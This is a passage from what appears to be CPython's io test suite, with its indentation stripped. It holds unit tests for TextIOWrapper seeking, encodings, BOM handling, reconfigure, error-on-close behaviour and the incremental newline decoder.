for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le":
f = self.open(os_helper.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(os_helper.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(os_helper.TESTFN, "w+", encoding="utf-8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
with self.open(os_helper.TESTFN, "wb") as f:
f.write(line*2)
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(os_helper.TESTFN, "wb") as f:
f.write(data)
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
#Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(os_helper.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(os_helper.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(os_helper.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_multibyte_seek_and_tell(self):
f = self.open(os_helper.TESTFN, "w", encoding="euc_jp")
f.write("AB\n\u3046\u3048\n")
f.close()
f = self.open(os_helper.TESTFN, "r", encoding="euc_jp")
self.assertEqual(f.readline(), "AB\n")
p0 = f.tell()
self.assertEqual(f.readline(), "\u3046\u3048\n")
p1 = f.tell()
f.seek(p0)
self.assertEqual(f.readline(), "\u3046\u3048\n")
self.assertEqual(f.tell(), p1)
f.close()
def test_seek_with_encoder_state(self):
f = self.open(os_helper.TESTFN, "w", encoding="euc_jis_2004")
f.write("\u00e6\u0300")
p0 = f.tell()
f.write("\u00e6")
f.seek(p0)
f.write("\u0300")
f.close()
f = self.open(os_helper.TESTFN, "r", encoding="euc_jis_2004")
self.assertEqual(f.readline(), "\u00e6\u0300\u0300")
f.close()
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable(), encoding="utf-8")
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"), encoding="utf-8")
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"), encoding="utf-8")
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"), encoding="utf-8")
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="utf-8")
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="utf-8")
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO(), encoding="utf-8")
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = os_helper.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = os_helper.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_seek_append_bom(self):
# Same test, but first seek to the start and then to the end
filename = os_helper.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
with self.open(filename, 'a', encoding=charset) as f:
f.seek(0)
f.seek(0, self.SEEK_END)
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_errors_property(self):
with self.open(os_helper.TESTFN, "w", encoding="utf-8") as f:
self.assertEqual(f.errors, "strict")
with self.open(os_helper.TESTFN, "w", encoding="utf-8", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@support.no_tracing
@threading_helper.requires_working_threading()
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(os_helper.TESTFN, "w", encoding="utf-8", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with threading_helper.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(os_helper.TESTFN, encoding="utf-8") as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
# Test that text file is closed despite failed flush
# and that flush() is called before file closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
txt.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(txt.closed)
# Silence destructor error
buffer.close = lambda: None
txt.flush = lambda: None
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
txt.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(txt.closed)
# Silence destructor error
buffer.close = lambda: None
txt.flush = lambda: None
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata), encoding="utf-8")
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_bufio_write_through(self):
# Issue #21396: write_through=True doesn't force a flush()
# on the underlying binary buffered object.
flush_called, write_called = [], []
class BufferedWriter(self.BufferedWriter):
def flush(self, *args, **kwargs):
flush_called.append(True)
return super().flush(*args, **kwargs)
def write(self, *args, **kwargs):
write_called.append(True)
return super().write(*args, **kwargs)
rawio = self.BytesIO()
data = b"a"
bufio = BufferedWriter(rawio, len(data)*2)
textio = self.TextIOWrapper(bufio, encoding='ascii',
write_through=True)
# write to the buffered io but don't overflow the buffer
text = data.decode('ascii')
textio.write(text)
# buffer.flush is not called with write_through=True
self.assertFalse(flush_called)
# buffer.write *is* called with write_through=True
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), b"") # no flush
write_called = [] # reset
textio.write(text * 10) # total content is larger than bufio buffer
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), data * 11) # all flushed
def test_reconfigure_write_through(self):
raw = self.MockRawIO([])
t = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
t.write('1')
t.reconfigure(write_through=True) # implied flush
self.assertEqual(t.write_through, True)
self.assertEqual(b''.join(raw._write_stack), b'1')
t.write('23')
self.assertEqual(b''.join(raw._write_stack), b'123')
t.reconfigure(write_through=False)
self.assertEqual(t.write_through, False)
t.write('45')
t.flush()
self.assertEqual(b''.join(raw._write_stack), b'12345')
# Keeping default value
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, False)
t.reconfigure(write_through=True)
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, True)
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
t = self.TextIOWrapper(self.StringIO('a'), encoding="utf-8")
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'), encoding="utf-8")
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'), encoding="utf-8")
self.assertRaises(TypeError, t.read)
def test_illegal_encoder(self):
# Issue 31271: Calling write() while the return value of encoder's
# encode() is invalid shouldn't cause an assertion failure.
rot13 = codecs.lookup("rot13")
with support.swap_attr(rot13, '_is_text_encoding', True):
t = io.TextIOWrapper(io.BytesIO(b'foo'), encoding="rot13")
self.assertRaises(TypeError, t.write, 'bar')
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
# Issue 31243: calling read() while the return value of decoder's
# getstate() is invalid should neither crash the interpreter nor
# raise a SystemError.
def _make_very_illegal_wrapper(getstate_ret_val):
class BadDecoder:
def getstate(self):
return getstate_ret_val
def _get_bad_decoder(dummy):
return BadDecoder()
quopri = codecs.lookup("quopri")
with support.swap_attr(quopri, 'incrementaldecoder',
_get_bad_decoder):
return _make_illegal_wrapper()
t = _make_very_illegal_wrapper(42)
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper(())
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper((1, 2))
self.assertRaises(TypeError, t.read, 42)
def _check_create_at_shutdown(self, **kwargs):
# Issue #20037: creating a TextIOWrapper at shutdown
# shouldn't crash the interpreter.
iomod = self.io.__name__
code = """if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __init__(self):
self.buf = io.BytesIO()
def __del__(self):
io.TextIOWrapper(self.buf, **{kwargs})
print("ok")
c = C()
""".format(iomod=iomod, kwargs=kwargs)
return assert_python_ok("-c", code)
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
# Can error out with a RuntimeError if the module state
# isn't found.
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual("ok", out.decode().strip())
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual("ok", out.decode().strip())
def test_read_byteslike(self):
r = MemviewBytesIO(b'Just some random string\n')
t = self.TextIOWrapper(r, 'utf-8')
# TextIOwrapper will not read the full string, because
# we truncate it to a multiple of the native int size
# so that we can construct a more complex memoryview.
bytes_val = _to_memoryview(r.getvalue()).tobytes()
self.assertEqual(t.read(200), bytes_val.decode('utf-8'))
def test_issue22849(self):
class F(object):
def readable(self): return True
def writable(self): return True
def seekable(self): return True
for i in range(10):
try:
self.TextIOWrapper(F(), encoding='utf-8')
except Exception:
pass
F.tell = lambda x: 0
t = self.TextIOWrapper(F(), encoding='utf-8')
def test_reconfigure_encoding_read(self):
# latin1 -> utf8
# (latin1 can decode utf-8 encoded string)
data = 'abc\xe9\n'.encode('latin1') + 'd\xe9f\n'.encode('utf8')
raw = self.BytesIO(data)
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
self.assertEqual(txt.readline(), 'abc\xe9\n')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(encoding='utf-8')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(newline=None)
def test_reconfigure_write_fromascii(self):
# ascii has a specific encodefunc in the C implementation,
# but utf-8-sig has not. Make sure that we get rid of the
# cached encodefunc when we switch encoders.
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('foo\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('\xe9\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'foo\n\xc3\xa9\n')
def test_reconfigure_write(self):
# latin -> utf8
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
txt.write('abc\xe9\n')
txt.reconfigure(encoding='utf-8')
self.assertEqual(raw.getvalue(), b'abc\xe9\n')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\xe9\nd\xc3\xa9f\n')
# ascii -> utf-8-sig: ensure that no BOM is written in the middle of
# the file
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\nd\xc3\xa9f\n')
def test_reconfigure_write_non_seekable(self):
raw = self.BytesIO()
raw.seekable = lambda: False
raw.seek = None
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
# If the raw stream is not seekable, there'll be a BOM
self.assertEqual(raw.getvalue(), b'abc\n\xef\xbb\xbfd\xc3\xa9f\n')
def test_reconfigure_defaults(self):
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', 'replace', '\n')
txt.reconfigure(encoding=None)
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.write('LF\n')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.reconfigure(errors='ignore')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'ignore')
txt.write('CRLF\n')
txt.reconfigure(encoding='utf-8', newline=None)
self.assertEqual(txt.errors, 'strict')
txt.seek(0)
self.assertEqual(txt.read(), 'LF\nCRLF\n')
self.assertEqual(txt.detach().getvalue(), b'LF\nCRLF\r\n')
def test_reconfigure_newline(self):
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline=None)
self.assertEqual(txt.readline(), 'CR\n')
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='')
self.assertEqual(txt.readline(), 'CR\r')
raw = self.BytesIO(b'CR\rLF\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\n')
self.assertEqual(txt.readline(), 'CR\rLF\n')
raw = self.BytesIO(b'LF\nCR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='\r')
self.assertEqual(txt.readline(), 'LF\nCR\r')
raw = self.BytesIO(b'CR\rCRLF\r\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.readline(), 'CR\rCRLF\r\n')
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', newline='\r')
txt.reconfigure(newline=None)
txt.write('linesep\n')
txt.reconfigure(newline='')
txt.write('LF\n')
txt.reconfigure(newline='\n')
txt.write('LF\n')
txt.reconfigure(newline='\r')
txt.write('CR\n')
txt.reconfigure(newline='\r\n')
txt.write('CRLF\n')
expected = 'linesep' + os.linesep + 'LF\nLF\nCR\rCRLF\r\n'
self.assertEqual(txt.detach().getvalue().decode('ascii'), expected)
def test_issue25862(self):
# Assertion failures occurred in tell() after read() and write().
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.read()
t.tell()
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.write('x')
t.tell()
class MemviewBytesIO(io.BytesIO):
'''A BytesIO object whose read method returns memoryviews
rather than bytes'''
def read1(self, len_):
return _to_memoryview(super().read1(len_))
def read(self, len_):
return _to_memoryview(super().read(len_))
def _to_memoryview(buf):
'''Convert bytes-object *buf* to a non-trivial memoryview'''
arr = array.array('i')
idx = len(buf) - len(buf) % arr.itemsize
arr.frombytes(buf[:idx])
return memoryview(arr)
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = "LookupError: unknown encoding: ascii"
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertRaises(ValueError, t.__init__, b, encoding="utf-8", newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
with warnings_helper.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(os_helper.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
def test_del__CHUNK_SIZE_SystemError(self):
t = self.TextIOWrapper(self.BytesIO(), encoding='ascii')
with self.assertRaises(AttributeError):
del t._CHUNK_SIZE
def test_internal_buffer_size(self):
# bpo-43260: TextIOWrapper's internal buffer should not store
# data larger than chunk size.
chunk_size = 8192 # default chunk size, updated later
class MockIO(self.MockRawIO):
def write(self, data):
if len(data) > chunk_size:
raise RuntimeError
return super().write(data)
buf = MockIO()
t = self.TextIOWrapper(buf, encoding="ascii")
chunk_size = t._CHUNK_SIZE
t.write("abc")
t.write("def")
# default chunk size is 8192 bytes so t don't write data to buf.
self.assertEqual([], buf._write_stack)
with self.assertRaises(RuntimeError):
t.write("x"*(chunk_size+1))
self.assertEqual([b"abcdef"], buf._write_stack)
t.write("ghi")
t.write("x"*chunk_size)
self.assertEqual([b"abcdef", b"ghi", b"x"*chunk_size], buf._write_stack)
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
shutdown_error = "LookupError: unknown encoding: ascii"
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
self.assertRaises(TypeError, decoder.setstate, 42)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
def test_translate(self):
# issue 35062
for translate in (-2, -1, 1, 2):
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate)
self.check_newline_decoding_utf8(decoder)
